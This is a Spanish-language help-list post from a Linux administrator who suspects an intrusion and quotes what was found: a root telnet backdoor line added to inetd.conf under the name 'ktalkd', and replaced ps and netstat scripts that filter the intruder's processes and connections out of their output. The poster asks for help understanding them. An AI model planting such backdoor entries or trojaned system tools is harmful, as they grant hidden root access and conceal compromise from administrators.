problemas con login

[Angel Santos Calderón]

Yo nuevamente lista.

Les decía que en el log secure encontre una conexion telnet desde un
servidor ubicado en la  red local ... bueno resulta que encontré que ha
esa misma hora aparecen como modificados los siguientes archivos:

inetd.conf      en el cual pude notar se añadió la siguiente línea:

ktalkd      stream      tcp       nowait      root
/usr/sbin/tcpd        in.telnetd

que es ktalkd?


Además me pude percatar que los archivos ps y netstat (dentro de
/usr/bin) aparecen modificados en tiempos muy cercanos uno del otro y
contienen lo siguiente:

Archvio PS
------------
#!/bin/sh
#
#psX By:syg
/bin/.ps   $1 > ~/.pstmp
cat ~/.pstmp | egrep -v "final | /bin/" >> ~/.pstmp1
mv ~/.pstmp ~/.pstmp >> /dev/null      2  > &1
cat ~/.pstmp
rm -fr ~/.pstmp  > /dev/null 2 > &1

Archivo Netstat
----------------
#!/bin/sh
#netstatX By:syg
/bin/.netstat $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.net
cat ~/.net | egrep -v "519 | ktalkd | dial |
62.11|vuoto|vuoto1|vuoto2|vuoto3|vuoto4" > ~/.net2
mv ~/.net2   ~/.net  >> /dev/null   2   > &1
cat ~/.net

Me gustaría saber si ven algo anormal en estos archivos o si pueden
explicarme que hacen los mismos?




-- 
Para desuscribirse, mande correo a: ayuda-unsubscribe en linux.org.mx
Para comandos adicionales, envíelo a: ayuda-help en linux.org.mx